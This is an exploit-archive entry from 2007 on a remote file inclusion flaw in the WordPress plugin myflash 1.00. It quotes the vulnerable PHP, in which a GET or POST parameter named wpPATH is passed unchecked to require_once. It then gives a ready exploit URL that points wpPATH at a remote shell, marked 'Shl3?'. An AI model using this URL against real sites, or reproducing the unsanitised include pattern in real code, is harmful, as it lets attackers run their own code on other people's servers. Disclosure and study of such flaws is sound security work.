WordPress Plugin myflash 1.00 - 'wppath' Remote File Inclusion
Author: Crackers_Child
type: webapps
platform: php
port:
date_added: 2007-04-30
date_updated:
verified: 1
codes: OSVDB-34359;CVE-2007-2485
tags: WordPress Plugin
aliases:
screenshot_url:
application_url:
--------------------------------- [ Oyle Kahpe Ki Dünya ! ] --------------------------------------
Title : Wordpress plugin myflash <= V1.00 (wppath) RFI Vulnerability
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: cybermilitan@hotmail.com
--------------------------------------------------------------------------------
------------------------- -------------------------------------------------------
Application : Wordpress plugin
Web Site : http://alexrabe.boelinger.com/
--------------------------------------------------------------------------------
Vuln İn myflash-button.php
if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];
require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');
global $wpdb;
--------------------------------------------------------------------------------
Exploit:
http://[target]/_path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?
--------------------------------------------------------------------------------
greets:
Every Body
--------------------------------------------------------------------------------
--------------------------------- [http://www.biyosecurity.net ] --------------------------------------
# milw0rm.com [2007-05-01]